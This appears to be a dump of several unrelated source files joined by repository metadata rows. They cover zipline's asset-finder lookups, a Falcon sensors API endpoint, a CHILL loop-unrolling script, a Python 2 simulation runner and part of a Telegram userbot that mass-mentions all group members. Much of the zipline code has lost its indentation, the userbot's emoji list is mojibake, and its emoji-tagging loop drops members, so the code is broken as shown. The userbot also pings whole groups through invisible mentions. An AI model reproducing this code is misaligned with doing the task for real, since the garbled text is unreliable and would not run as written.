return merge(row, symbols[row['sid']])
else:
mkdict = dict
for assets in group_into_chunks(sids):
# Load misses from the db.
query = self._select_assets_by_sid(asset_tbl, assets)
for row in query.execute().fetchall():
yield _convert_asset_timestamp_fields(mkdict(row))
def _retrieve_assets(self, sids, asset_tbl, asset_type):
"""
Internal function for loading assets from a table.
This should be the only method of `AssetFinder` that writes Assets into
self._asset_cache.
Parameters
---------
sids : iterable of int
Asset ids to look up.
asset_tbl : sqlalchemy.Table
Table from which to query assets.
asset_type : type
Type of asset to be constructed.
Returns
-------
assets : dict[int -> Asset]
Dict mapping requested sids to the retrieved assets.
"""
# Fastpath for empty request.
if not sids:
return {}
cache = self._asset_cache
hits = {}
querying_equities = issubclass(asset_type, Equity)
filter_kwargs = (
_filter_equity_kwargs
if querying_equities else
_filter_future_kwargs
)
rows = self._retrieve_asset_dicts(sids, asset_tbl, querying_equities)
for row in rows:
sid = row['sid']
asset = asset_type(**filter_kwargs(row))
hits[sid] = cache[sid] = asset
# If we get here, it means something in our code thought that a
# particular sid was an equity/future and called this function with a
# concrete type, but we couldn't actually resolve the asset. This is
# an error in our code, not a user-input error.
misses = tuple(set(sids) - viewkeys(hits))
if misses:
if querying_equities:
raise EquitiesNotFound(sids=misses)
else:
raise FutureContractsNotFound(sids=misses)
return hits
    def _lookup_symbol_strict(self, symbol, as_of_date):
        """Resolve ``symbol`` to an Equity requiring an exact symbol match.

        If ``as_of_date`` is None the symbol must have had exactly one
        owner over all time; otherwise the owner on that date is returned.
        Raises SymbolNotFound or MultipleSymbolsFound accordingly.
        """
        # split the symbol into the components, if there are no
        # company/share class parts then share_class_symbol will be empty
        company_symbol, share_class_symbol = split_delimited_symbol(symbol)
        try:
            owners = self.symbol_ownership_map[
                company_symbol,
                share_class_symbol,
            ]
            assert owners, 'empty owners list for %r' % symbol
        except KeyError:
            # no equity has ever held this symbol
            raise SymbolNotFound(symbol=symbol)
        if not as_of_date:
            if len(owners) > 1:
                # more than one equity has held this ticker, this is ambiguous
                # without the date
                raise MultipleSymbolsFound(
                    symbol=symbol,
                    options=set(map(
                        compose(self.retrieve_asset, attrgetter('sid')),
                        owners,
                    )),
                )
            # exactly one equity has ever held this symbol, we may resolve
            # without the date
            return self.retrieve_asset(owners[0].sid)
        for start, end, sid, _ in owners:
            if start <= as_of_date < end:
                # find the equity that owned it on the given asof date
                return self.retrieve_asset(sid)
        # no equity held the ticker on the given asof date
        raise SymbolNotFound(symbol=symbol)
def _lookup_symbol_fuzzy(self, symbol, as_of_date):
symbol = symbol.upper()
company_symbol, share_class_symbol = split_delimited_symbol(symbol)
try:
owners = self.fuzzy_symbol_ownership_map[
company_symbol + share_class_symbol
]
assert owners, 'empty owners list for %r' % symbol
except KeyError:
# no equity has ever held a symbol matching the fuzzy symbol
raise SymbolNotFound(symbol=symbol)
if not as_of_date:
if len(owners) == 1:
# only one valid match
return self.retrieve_asset(owners[0].sid)
options = []
for _, _, sid, sym in owners:
if sym == symbol:
# there are multiple options, look for exact matches
options.append(self.retrieve_asset(sid))
if len(options) == 1:
# there was only one exact match
return options[0]
# there are more than one exact match for this fuzzy symbol
raise MultipleSymbolsFound(
symbol=symbol,
options=set(options),
)
options = {}
for start, end, sid, sym in owners:
if start <= as_of_date < end:
# see which fuzzy symbols were owned on the asof date.
options[sid] = sym
if not options:
# no equity owned the fuzzy symbol on the date requested
raise SymbolNotFound(symbol=symbol)
sid_keys = list(options.keys())
# If there was only one owner, or there is a fuzzy and non-fuzzy which
# map to the same sid, return it.
if len(options) == 1:
return self.retrieve_asset(sid_keys[0])
for sid, sym in options.items():
# Possible to have a scenario where multiple fuzzy matches have the
# same date. Want to find the one where symbol and share class
# match.
if (company_symbol, share_class_symbol) == \
split_delimited_symbol(sym):
return self.retrieve_asset(sid)
# multiple equities held tickers matching the fuzzy ticker but
# there are no exact matches
raise MultipleSymbolsFound(
symbol=symbol,
options=[self.retrieve_asset(s) for s in sid_keys],
)
def lookup_symbol(self, symbol, as_of_date, fuzzy=False):
"""Lookup an equity by symbol.
Parameters
----------
symbol : str
The ticker symbol to resolve.
as_of_date : datetime or None
Look up the last owner of this symbol as of this datetime.
If ``as_of_date`` is None, then this can only resolve the equity
if exactly one equity has ever owned the ticker.
fuzzy : bool, optional
Should fuzzy symbol matching be used? Fuzzy symbol matching
attempts to resolve differences in representations for
shareclasses. For example, some people may represent the ``A``
shareclass of ``BRK`` as ``BRK.A``, where others could write
``BRK_A``.
Returns
-------
equity : Equity
The equity that held ``symbol`` on the given ``as_of_date``, or the
only equity to hold ``symbol`` if ``as_of_date`` is None.
Raises
------
SymbolNotFound
Raised when no equity has ever held the given symbol.
MultipleSymbolsFound
Raised when no ``as_of_date`` is given and more than one equity
has held ``symbol``. This is also raised when ``fuzzy=True`` and
there are multiple candidates for the given ``symbol`` on the
``as_of_date``.
"""
if symbol is None:
raise TypeError("Cannot lookup asset for symbol of None for "
"as of date %s." % as_of_date)
if fuzzy:
return self._lookup_symbol_fuzzy(symbol, as_of_date)
return self._lookup_symbol_strict(symbol, as_of_date)
def lookup_symbols(self, symbols, as_of_date, fuzzy=False):
"""
Lookup a list of equities by symbol.
Equivalent to::
[finder.lookup_symbol(s, as_of, fuzzy) for s in symbols]
but potentially faster because repeated lookups are memoized.
Parameters
----------
symbols : sequence[str]
Sequence of ticker symbols to resolve.
as_of_date : pd.Timestamp
Forwarded to ``lookup_symbol``.
fuzzy : bool, optional
Forwarded to ``lookup_symbol``.
Returns
-------
equities : list[Equity]
"""
memo = {}
out = []
append_output = out.append
for sym in symbols:
if sym in memo:
append_output(memo[sym])
else:
equity = memo[sym] = self.lookup_symbol(sym, as_of_date, fuzzy)
append_output(equity)
return out
def lookup_future_symbol(self, symbol):
"""Lookup a future contract by symbol.
Parameters
----------
symbol : str
The symbol of the desired contract.
Returns
-------
future : Future
The future contract referenced by ``symbol``.
Raises
------
SymbolNotFound
Raised when no contract named 'symbol' is found.
"""
data = self._select_asset_by_symbol(self.futures_contracts, symbol)\
.execute().fetchone()
# If no data found, raise an exception
if not data:
raise SymbolNotFound(symbol=symbol)
return self.retrieve_asset(data['sid'])
def lookup_by_supplementary_field(self, field_name, value, as_of_date):
try:
owners = self.equity_supplementary_map[
field_name,
value,
]
assert owners, 'empty owners list for %r' % (field_name, value)
except KeyError:
# no equity has ever held this value
raise ValueNotFoundForField(field=field_name, value=value)
if not as_of_date:
if len(owners) > 1:
# more than one equity has held this value, this is ambigious
# without the date
raise MultipleValuesFoundForField(
field=field_name,
value=value,
options=set(map(
compose(self.retrieve_asset, attrgetter('sid')),
owners,
)),
)
# exactly one equity has ever held this value, we may resolve
# without the date
return self.retrieve_asset(owners[0].sid)
for start, end, sid, _ in owners:
if start <= as_of_date < end:
# find the equity that owned it on the given asof date
return self.retrieve_asset(sid)
# no equity held the value on the given asof date
raise ValueNotFoundForField(field=field_name, value=value)
def get_supplementary_field(
self,
sid,
field_name,
as_of_date,
):
"""Get the value of a supplementary field for an asset.
Parameters
----------
sid : int
The sid of the asset to query.
field_name : str
Name of the supplementary field.
as_of_date : pd.Timestamp, None
The last known value on this date is returned. If None, a
value is returned only if we've only ever had one value for
this sid. If None and we've had multiple values,
MultipleValuesFoundForSid is raised.
Raises
------
NoValueForSid
If we have no values for this asset, or no values was known
on this as_of_date.
MultipleValuesFoundForSid
If we have had multiple values for this asset over time, and
None was passed for as_of_date.
"""
try:
periods = self.equity_supplementary_map_by_sid[
field_name,
sid,
]
assert periods, 'empty periods list for %r' % (field_name, sid)
except KeyError:
raise NoValueForSid(field=field_name, sid=sid)
if not as_of_date:
if len(periods) > 1:
# This equity has held more than one value, this is ambigious
# without the date
raise MultipleValuesFoundForSid(
field=field_name,
sid=sid,
options={p.value for p in periods},
)
# this equity has only ever held this value, we may resolve
# without the date
return periods[0].value
for start, end, _, value in periods:
if start <= as_of_date < end:
return value
# Could not find a value for this sid on the as_of_date.
raise NoValueForSid(field=field_name, sid=sid)
def _get_contract_sids(self, root_symbol):
fc_cols = self.futures_contracts.c
return [r.sid for r in
list(sa.select((fc_cols.sid,)).where(
(fc_cols.root_symbol == root_symbol) &
(fc_cols.start_date != pd.NaT.value)).order_by(
fc_cols.sid).execute().fetchall())]
def _get_root_symbol_exchange(self, root_symbol):
fc_cols = self.futures_root_symbols.c
fields = (fc_cols.exchange,)
exchange = sa.select(fields).where(
fc_cols.root_symbol == root_symbol).execute().scalar()
if exchange is not None:
return exchange
else:
raise SymbolNotFound(symbol=root_symbol)
def get_ordered_contracts(self, root_symbol):
try:
return self._ordered_contracts[root_symbol]
except KeyError:
contract_sids = self._get_contract_sids(root_symbol)
contracts = deque(self.retrieve_all(contract_sids))
chain_predicate = self._future_chain_predicates.get(root_symbol,
None)
oc = OrderedContracts(root_symbol, contracts, chain_predicate)
self._ordered_contracts[root_symbol] = oc
return oc
def create_continuous_future(self,
root_symbol,
offset,
roll_style,
adjustment):
if adjustment not in ADJUSTMENT_STYLES:
raise ValueError(
'Invalid adjustment style {!r}. Allowed adjustment styles are '
'{}.'.format(adjustment, list(ADJUSTMENT_STYLES))
)
oc = self.get_ordered_contracts(root_symbol)
exchange = self._get_root_symbol_exchange(root_symbol)
sid = _encode_continuous_future_sid(root_symbol, offset,
roll_style,
None)
mul_sid = _encode_continuous_future_sid(root_symbol, offset,
roll_style,
'div')
add_sid = _encode_continuous_future_sid(root_symbol, offset,
roll_style,
'add')
cf_template = partial(
ContinuousFuture,
root_symbol=root_symbol,
offset=offset,
roll_style=roll_style,
start_date=oc.start_date,
end_date=oc.end_date,
exchange=exchange,
)
cf = cf_template(sid=sid)
mul_cf = cf_template(sid=mul_sid, adjustment='mul')
add_cf = cf_template(sid=add_sid, adjustment='add')
self._asset_cache[cf.sid] = cf
self._asset_cache[mul_cf.sid] = mul_cf
self._asset_cache[add_cf.sid] = add_cf
return {None: cf, 'mul': mul_cf, 'add': add_cf}[adjustment]
def _make_sids(tblattr):
def _(self):
return tuple(map(
itemgetter('sid'),
sa.select((
getattr(self, tblattr).c.sid,
)).execute().fetchall(),
))
return _
sids = property(
_make_sids('asset_router'),
doc='All the sids in the asset finder.',
)
equities_sids = property(
_make_sids('equities'),
doc='All of the sids for equities in the asset finder.',
)
futures_sids = property(
_make_sids('futures_contracts'),
doc='All of the sids for futures consracts in the asset finder.',
)
del _make_sids
@lazyval
def _symbol_lookups(self):
"""
An iterable of symbol lookup functions to use with ``lookup_generic``
Attempts equities lookup, then futures.
"""
return (
self.lookup_symbol,
# lookup_future_symbol method does not use as_of date, since
# symbols are unique.
#
# Wrap the function in a lambda so that both methods share a
# signature, so that when the functions are iterated over
# the consumer can use the same arguments with both methods.
lambda symbol, _: self.lookup_future_symbol(symbol)
)
def _lookup_generic_scalar(self,
asset_convertible,
as_of_date,
matches,
missing):
"""
Convert asset_convertible to an asset.
On success, append to matches.
On failure, append to missing.
"""
if isinstance(asset_convertible, Asset):
matches.append(asset_convertible)
elif isinstance(asset_convertible, Integral):
try:
result = self.retrieve_asset(int(asset_convertible))
except SidsNotFound:
missing.append(asset_convertible)
return None
matches.append(result)
elif isinstance(asset_convertible, string_types):
for lookup in self._symbol_lookups:
try:
matches.append(lookup(asset_convertible, as_of_date))
return
except SymbolNotFound:
continue
else:
missing.append(asset_convertible)
return None
else:
raise NotAssetConvertible(
"Input was %s, not AssetConvertible."
% asset_convertible
)
def lookup_generic(self,
asset_convertible_or_iterable,
as_of_date):
"""
Convert a AssetConvertible or iterable of AssetConvertibles into
a list of Asset objects.
This method exists primarily as a convenience for implementing
user-facing APIs that can handle multiple kinds of input. It should
not be used for internal code where we already know the expected types
of our inputs.
Returns a pair of objects, the first of which is the result of the
conversion, and the second of which is a list containing any values
that couldn't be resolved.
"""
matches = []
missing = []
# Interpret input as scalar.
if isinstance(asset_convertible_or_iterable, AssetConvertible):
self._lookup_generic_scalar(
asset_convertible=asset_convertible_or_iterable,
as_of_date=as_of_date,
matches=matches,
missing=missing,
)
try:
return matches[0], missing
except IndexError:
if hasattr(asset_convertible_or_iterable, '__int__'):
raise SidsNotFound(sids=[asset_convertible_or_iterable])
else:
raise SymbolNotFound(symbol=asset_convertible_or_iterable)
# If the input is a ContinuousFuture just return it as-is.
elif isinstance(asset_convertible_or_iterable, ContinuousFuture):
return asset_convertible_or_iterable, missing
# Interpret input as iterable.
try:
iterator = iter(asset_convertible_or_iterable)
except TypeError:
raise NotAssetConvertible(
"Input was not a AssetConvertible "
"or iterable of AssetConvertible."
)
for obj in iterator:
if isinstance(obj, ContinuousFuture):
matches.append(obj)
else:
self._lookup_generic_scalar(obj, as_of_date, matches, missing)
return matches, missing
def map_identifier_index_to_sids(self, index, as_of_date):
"""
This method is for use in sanitizing a user's DataFrame or Panel
inputs.
Takes the given index of identifiers, checks their types, builds assets
if necessary, and returns a list of the sids that correspond to the
input index.
Parameters
----------
index : Iterable
An iterable containing ints, strings, or Assets
as_of_date : pandas.Timestamp
A date to be used to resolve any dual-mapped symbols
Returns
-------
List
A list of integer sids corresponding to the input index
"""
# This method assumes that the type of the objects in the index is
# consistent and can, therefore, be taken from the first identifier
first_identifier = index[0]
# Ensure that input is AssetConvertible (integer, string, or Asset)
if not isinstance(first_identifier, AssetConvertible):
raise MapAssetIdentifierIndexError(obj=first_identifier)
# If sids are provided, no mapping is necessary
if isinstance(first_identifier, Integral):
return index
# Look up all Assets for mapping
matches = []
missing = []
for identifier in index:
self._lookup_generic_scalar(identifier, as_of_date,
matches, missing)
if missing:
raise ValueError("Missing assets for identifiers: %s" % missing)
# Return a list of the sids of the found assets
return [asset.sid for asset in matches]
    def _compute_asset_lifetimes(self):
        """
        Compute and cache a recarray of asset lifetimes.

        Returns a recarray with integer fields ``sid``, ``start`` and
        ``end`` (nanosecond timestamps), one row per equity. Missing
        start dates become 0 and missing end dates become INTMAX so that
        range comparisons in ``lifetimes`` work without NaN handling.
        """
        equities_cols = self.equities.c
        buf = np.array(
            tuple(
                sa.select((
                    equities_cols.sid,
                    equities_cols.start_date,
                    equities_cols.end_date,
                )).execute(),
            ), dtype='<f8', # use doubles so we get NaNs
        )
        lifetimes = np.recarray(
            buf=buf,
            shape=(len(buf),),
            dtype=[
                ('sid', '<f8'),
                ('start', '<f8'),
                ('end', '<f8')
            ],
        )
        start = lifetimes.start
        end = lifetimes.end
        start[np.isnan(start)] = 0 # convert missing starts to 0
        end[np.isnan(end)] = np.iinfo(int).max # convert missing end to INTMAX
        # Cast the results back down to int.
        return lifetimes.astype([
            ('sid', '<i8'),
            ('start', '<i8'),
            ('end', '<i8'),
        ])
def lifetimes(self, dates, include_start_date):
"""
Compute a DataFrame representing asset lifetimes for the specified date
range.
Parameters
----------
dates : pd.DatetimeIndex
The dates for which to compute lifetimes.
include_start_date : bool
Whether or not to count the asset as alive on its start_date.
This is useful in a backtesting context where `lifetimes` is being
used to signify "do I have data for this asset as of the morning of
this date?" For many financial metrics, (e.g. daily close), data
isn't available for an asset until the end of the asset's first
day.
Returns
-------
lifetimes : pd.DataFrame
A frame of dtype bool with `dates` as index and an Int64Index of
assets as columns. The value at `lifetimes.loc[date, asset]` will
be True iff `asset` existed on `date`. If `include_start_date` is
False, then lifetimes.loc[date, asset] will be false when date ==
asset.start_date.
See Also
--------
numpy.putmask
zipline.pipeline.engine.SimplePipelineEngine._compute_root_mask
"""
# This is a less than ideal place to do this, because if someone adds
# assets to the finder after we've touched lifetimes we won't have
# those new assets available. Mutability is not my favorite
# programming feature.
if self._asset_lifetimes is None:
self._asset_lifetimes = self._compute_asset_lifetimes()
lifetimes = self._asset_lifetimes
raw_dates = as_column(dates.asi8)
if include_start_date:
mask = lifetimes.start <= raw_dates
else:
mask = lifetimes.start < raw_dates
mask &= (raw_dates <= lifetimes.end)
return pd.DataFrame(mask, index=dates, columns=lifetimes.sid)
class AssetConvertible(with_metaclass(ABCMeta)):
    """
    ABC for types that are convertible to integer-representations of
    Assets.
    Includes Asset, six.string_types, and Integral
    """
    pass
# Register concrete types as virtual subclasses so that
# isinstance(x, AssetConvertible) succeeds without actual inheritance.
AssetConvertible.register(Integral)
AssetConvertible.register(Asset)
# Use six.string_types for Python2/3 compatibility
for _type in string_types:
    AssetConvertible.register(_type)
class NotAssetConvertible(ValueError):
    """Raised when a value cannot be interpreted as an Asset."""
    pass
class PricingDataAssociable(with_metaclass(ABCMeta)):
    """
    ABC for types that can be associated with pricing data.
    Includes Asset, Future, ContinuousFuture
    """
    pass
# Virtual-subclass registrations mirroring the docstring above.
PricingDataAssociable.register(Asset)
PricingDataAssociable.register(Future)
PricingDataAssociable.register(ContinuousFuture)
def was_active(reference_date_value, asset):
    """
    Return whether `asset` was alive at `reference_date_value`.

    Parameters
    ----------
    reference_date_value : int
        Date, represented as nanoseconds since EPOCH, for which we want to
        know if `asset` was alive. This is generally the result of accessing
        the `value` attribute of a pandas Timestamp.
    asset : Asset
        The asset object to check.

    Returns
    -------
    was_active : bool
        Whether or not the `asset` existed at the specified time.
    """
    start = asset.start_date.value
    end = asset.end_date.value
    # Alive means the reference date falls inside the closed interval
    # [start_date, end_date].
    return start <= reference_date_value and reference_date_value <= end
def only_active_assets(reference_date_value, assets):
    """
    Filter `assets` down to those alive at `reference_date_value`.

    Parameters
    ----------
    reference_date_value : int
        Date, represented as nanoseconds since EPOCH, for which we want to
        know if each asset was alive. This is generally the result of
        accessing the `value` attribute of a pandas Timestamp.
    assets : iterable[Asset]
        The assets to filter.

    Returns
    -------
    active_assets : list
        List of the active assets from `assets` on the requested date.
    """
    active = []
    for asset in assets:
        if was_active(reference_date_value, asset):
            active.append(asset)
    return active
| 33.08662 | 79 | 0.584701 |
ace8d0489e59bc8af8aad1550f95b3ae46ae7079 | 2,292 | py | Python | catalog/client/services/sensors.py | eoss-cloud/madxxx_catalog_api | ef37374a36129de4f0a6fe5dd46b5bc2e2f01d1d | [
"MIT"
] | null | null | null | catalog/client/services/sensors.py | eoss-cloud/madxxx_catalog_api | ef37374a36129de4f0a6fe5dd46b5bc2e2f01d1d | [
"MIT"
] | null | null | null | catalog/client/services/sensors.py | eoss-cloud/madxxx_catalog_api | ef37374a36129de4f0a6fe5dd46b5bc2e2f01d1d | [
"MIT"
] | null | null | null | #-*- coding: utf-8 -*-
""" EOSS catalog system
functionality for the sensors endpoint
"""
__author__ = "Thilo Wehrmann, Steffen Gebhardt"
__copyright__ = "Copyright 2016, EOSS GmbH"
__credits__ = ["Thilo Wehrmann", "Steffen Gebhardt"]
__license__ = "GPL"
__version__ = "1.0.0"
__maintainer__ = "Thilo Wehrmann"
__email__ = "twehrmann@eoss.cloud"
__status__ = "Production"
import ujson
import logging
import falcon
from api import General_Structure
from client.services.root_service import struct
from api_logging import logger
from .db_calls import Persistance
from .tools import can_zip_response, compress_body
class Sensors:
    """Falcon resource backing the /sensors endpoint.

    Serves the list of sensors known to the EOSS catalog, optionally
    grouped by an attribute (sensor_level, mission, platform).
    """

    def __init__(self):
        self.logger = logging.getLogger('eoss.' + __name__)
        self.default_status = falcon.HTTP_200
        self.default_content_type = 'application/json'
        # Headers attached to every response from this resource.
        self.headers = {'api-version': struct['version'],
                        'Content-Type': self.default_content_type}

    def on_get(self, req, resp, group=None):
        """Handles GET requests

        http://localhost:8000/sensors
        http://localhost:8000/sensors/platform (sensor_level, mission, platform)

        Raises
        ------
        falcon.HTTPNotFound
            If no sensors are found for the requested group.
        """
        if group:
            logger.info('[GET] /sensors/%s' % group)
        else:
            logger.info('[GET] /sensors/')
        # BUG FIX: dict.iteritems() exists only in Python 2 and raises
        # AttributeError under Python 3; dict.items() behaves identically
        # for this purpose on both versions.
        for key, value in self.headers.items():
            resp.set_header(key, value)
        # set default group to sensor_level
        if not group:
            group = 'sensor_level'
        results = list()
        for counter, result in enumerate(Persistance().get_sensors(group)):
            values = {'sensor_name': result[1], 'proc_level': result[2], 'id': counter,
                      'label': '%s' % result[0], 'type': group}
            types = {'sensor_name': str, 'proc_level': str, 'id': int, 'label': str, 'type': str}
            x = General_Structure(values, types)
            x.__class__.__name__ = 'Sensor'
            results.append(x.__dict__)
        if len(results) == 0:
            raise falcon.HTTPNotFound()
        resp.status = self.default_status
        # Compress the payload when the client advertises gzip support.
        if can_zip_response(req.headers):
            resp.set_header('Content-Encoding', 'gzip')
            resp.body = compress_body(ujson.dumps(results))
        else:
            resp.body = ujson.dumps(results)
| 32.28169 | 97 | 0.628709 |
ace8d0ad7c0cbd9cd70601331cd61e119571c10f | 313 | py | Python | chill/examples/chill/testcases/trmm.py | CompOpt4Apps/Artifact-DataDepSimplify | 4fa1bf2bda2902fec50a54ee79ae405a554fc9f4 | [
"MIT"
] | 5 | 2019-05-20T03:35:41.000Z | 2021-09-16T22:22:13.000Z | chill/examples/chill/testcases/trmm.py | CompOpt4Apps/Artifact-DataDepSimplify | 4fa1bf2bda2902fec50a54ee79ae405a554fc9f4 | [
"MIT"
] | null | null | null | chill/examples/chill/testcases/trmm.py | CompOpt4Apps/Artifact-DataDepSimplify | 4fa1bf2bda2902fec50a54ee79ae405a554fc9f4 | [
"MIT"
] | null | null | null | # Unroll-and-jam nonrectangular loop nest using example of triangular
# matrix multiply. Compare with paper "Register Tiling in
# Nonrectangular Iteration Spaces" by Jimenez et al, TOPLAS 2002.
from chill import *
source('trmm.c')
procedure('trmm')
loop(0)
original()
unroll(0,2,2)
unroll(0,3,2)
print_code()
| 19.5625 | 69 | 0.753994 |
ace8d1acd30fe2c667d13d8e619abbe2fe18ce00 | 512 | py | Python | lab2/part2/simulationrun.py | vtaxiarchis/distributed_systems_advanced | 3bbf6e2b45af1cc535ca08caf61d8031ba644aae | [
"MIT"
] | null | null | null | lab2/part2/simulationrun.py | vtaxiarchis/distributed_systems_advanced | 3bbf6e2b45af1cc535ca08caf61d8031ba644aae | [
"MIT"
] | null | null | null | lab2/part2/simulationrun.py | vtaxiarchis/distributed_systems_advanced | 3bbf6e2b45af1cc535ca08caf61d8031ba644aae | [
"MIT"
] | null | null | null | #!/bin/pyton
import random
import sys
millisecond = 10000000
def special():
    """Placeholder predicate; always reports True."""
    return True
def run(argv,t,r,n,gain):
if len(argv) <= 2:
seconds = 40
else:
seconds = int(sys.argv[2])
for i in range(0,n):
t.getNode(i).bootAtTime(random.randint(0,1*millisecond))
print "Running for", seconds, "seconds:", seconds * 10000000000
t.runNextEvent()
time = t.time()
while (time + seconds * 1000 * millisecond > t.time()):
#print "ping"
t.runNextEvent()
| 20.48 | 67 | 0.607422 |
ace8d1c126be998be318caa96811b8e3535c2584 | 4,968 | py | Python | userbot/modules/tag_all.py | SharingUserbot/Man-Userbot | 6d8ec13a1639d3f0bf641522f8226afccf1c12b8 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/tag_all.py | SharingUserbot/Man-Userbot | 6d8ec13a1639d3f0bf641522f8226afccf1c12b8 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/tag_all.py | SharingUserbot/Man-Userbot | 6d8ec13a1639d3f0bf641522f8226afccf1c12b8 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2022-03-10T13:22:19.000Z | 2022-03-10T13:22:19.000Z | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ReCode by @mrismanaziz
# FROM Man-Userbot <https://github.com/mrismanaziz/Man-Userbot>
# t.me/SharingUserbot & t.me/Lunatic0de
import asyncio
import random
import re
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, bot
from userbot.events import man_cmd
usernexp = re.compile(r"@(\w{3,32})\[(.+?)\]")
nameexp = re.compile(r"\[([\w\S]+)\]\(tg://user\?id=(\d+)\)\[(.+?)\]")
emoji = "๐ ๐ ๐ ๐ ๐ ๐
๐ ๐คฃ ๐ญ ๐ ๐ ๐ ๐ ๐ฅฐ ๐ ๐คฉ ๐ฅณ ๐ค ๐ ๐ โบ๏ธ ๐ ๐ ๐ ๐ ๐คญ ๐ถ ๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐คช ๐ค ๐คจ ๐ง ๐ ๐ ๐ค ๐ ๐คฌ โน๏ธ ๐ ๐ ๐ ๐ฅบ ๐ณ ๐ฌ ๐ค ๐คซ ๐ฐ ๐จ ๐ง ๐ฆ ๐ฎ ๐ฏ ๐ฒ ๐ฑ ๐คฏ ๐ข ๐ฅ ๐ ๐ ๐ ๐ฃ ๐ฉ ๐ซ ๐คค ๐ฅฑ ๐ด ๐ช ๐ ๐ ๐ ๐ ๐ฒ ๐งฉ โ ๐ฏ ๐ณ ๐ญ๐ ๐ ๐ ๐ ๐ โค๏ธโ๐ฅ ๐ ๐ค ๐ค ๐ค โค๏ธ ๐งก ๐ ๐ ๐ ๐ ๐ ๐ ๐ต ๐ฆ ๐ฏ ๐ฑ ๐ถ ๐บ ๐ป ๐จ ๐ผ ๐น ๐ญ ๐ฐ ๐ฆ ๐ฆ ๐ฎ ๐ท ๐ฝ ๐ ๐ฆ ๐ฆ ๐ด ๐ธ ๐ฒ ๐ฆ ๐ ๐ฆ ๐ฆ ๐ข ๐ ๐ ๐ ๐ ๐ ๐ ๐ฉ ๐ ๐ฆฎ ๐โ๐ฆบ ๐
๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐ฆ ๐ฆ ๐ฆฅ ๐ฆ ๐ ๐ฆ ๐ฆ ๐ฆ ๐ ๐ฆ ๐ฆง ๐ช ๐ซ ๐ฟ๏ธ ๐ฆจ ๐ฆก ๐ฆ ๐ฆฆ ๐ฆ ๐ ๐ ๐ฃ ๐ค ๐ฅ ๐ฆ ๐ฆ ๐ฆ
๐ฆ ๐๏ธ ๐ฆข ๐ฆฉ ๐ฆ ๐ฆ ๐ฆ ๐ง ๐ฆ ๐ฌ ๐ ๐ณ ๐ ๐ ๐ก ๐ฆ ๐ฆ ๐ฆ ๐ฆ ๐ ๐ฆช ๐ฆ ๐ท๏ธ ๐ฆ ๐ ๐ ๐ฆ ๐ฆ ๐ ๐ ๐ ๐ธ๏ธ ๐ ๐พ ๐ ๐คข ๐คฎ ๐คง ๐ค ๐ ๐ ๐ ๐ ๐ ๐ ๐ฅญ ๐ ๐ ๐ถ ๐ ๐ฅ ๐ ๐ ๐ ๐ ๐ ๐ฅ ๐ ๐ง
๐ฝ ๐ฅฆ ๐ฅ ๐ฅฌ ๐ฅ ๐ฅฏ ๐ฅ ๐ฅ ๐ ๐ฅ ๐ฐ ๐ฅ ๐ง ๐ ๐ง ๐ฅ ๐ฅ ๐ง ๐ฅ ๐ฅฉ ๐ ๐ ๐ฅ ๐ฏ ๐ฎ ๐ ๐ ๐ฅจ ๐ฅช ๐ญ ๐ ๐ง ๐ฅ ๐ ๐ฅซ ๐ฅฃ ๐ฅ ๐ฒ ๐ ๐ ๐ข ๐ฅ ๐ฑ ๐ ๐ฅก ๐ค ๐ฃ ๐ฆ ๐ฆช ๐ ๐ก ๐ฅ ๐ฅฎ ๐ง ๐จ".split(
" "
)
class FlagContainer:
    """Module-wide flag shared by the tagging handlers."""
    # True while a tag broadcast is in progress; the participant loops
    # poll it so a userbot restart can abort an ongoing tagging run.
    is_active = False
@bot.on(man_cmd(outgoing=True, pattern=r"mention(?: |$)(.*)"))
async def _(event):
    """Silently ping every chat member via invisible zero-width mentions."""
    # Ignore forwarded copies of the command.
    if event.fwd_from:
        return
    await event.delete()
    query = event.pattern_match.group(1)
    mentions = f"@all {query}"
    chat = await event.get_input_chat()
    # \u2063 (invisible separator) as link text: each member is mentioned
    # (and notified) without visible text in the message.
    # NOTE(review): `{query}` is embedded inside the tg:// link target,
    # not the visible text - looks unintentional; confirm.
    async for x in bot.iter_participants(chat, 100500):
        mentions += f"[\u2063](tg://user?id={x.id} {query})"
    await bot.send_message(chat, mentions, reply_to=event.message.reply_to_msg_id)
@bot.on(man_cmd(outgoing=True, pattern=r"emojitag(?: |$)(.*)"))
async def _(event):
    """Tag chat members with random emoji; guarded against re-entry."""
    # Skip forwarded commands and refuse to start while a run is active.
    if event.fwd_from or FlagContainer.is_active:
        return
    try:
        FlagContainer.is_active = True
        text = None
        args = event.message.text.split(" ", 1)
        if len(args) > 1:
            text = args[1]
        chat = await event.get_input_chat()
        await event.delete()
        # Initial tag list covering all participants.
        tags = list(
            map(
                lambda m: f"[{random.choice(emoji)}](tg://user?id={m.id})",
                await event.client.get_participants(chat),
            ),
        )
        current_pack = []
        # Walk participants in packs of five; checking the flag each
        # iteration lets `.restart` abort the run.
        # NOTE(review): each full pack of 5 *overwrites* `tags`, and only
        # one message is sent after the loop, so members in the final
        # partial pack are never tagged - presumably the intent was to
        # send one message per pack; confirm before relying on this.
        async for participant in event.client.iter_participants(chat):
            if not FlagContainer.is_active:
                break
            current_pack.append(participant)
            if len(current_pack) == 5:
                tags = list(
                    map(
                        lambda m: f"[{random.choice(emoji)}](tg://user?id={m.id})",
                        current_pack,
                    ),
                )
                current_pack = []
        if text:
            tags.append(text)
        await event.client.send_message(event.chat_id, " ".join(tags))
        # Brief pause to avoid Telegram flood limits.
        await asyncio.sleep(2)
    finally:
        # Always release the re-entry guard, even on error/abort.
        FlagContainer.is_active = False
@bot.on(man_cmd(outgoing=True, pattern=r"all(?: |$)(.*)"))
async def _(event):
    """Tag chat members by first name; guarded against re-entry."""
    # Skip forwarded commands and refuse to start while a run is active.
    if event.fwd_from or FlagContainer.is_active:
        return
    try:
        FlagContainer.is_active = True
        text = None
        args = event.message.text.split(" ", 1)
        if len(args) > 1:
            text = args[1]
        chat = await event.get_input_chat()
        await event.delete()
        # Initial tag list covering all participants.
        tags = list(
            map(
                lambda m: f"[{m.first_name}](tg://user?id={m.id})",
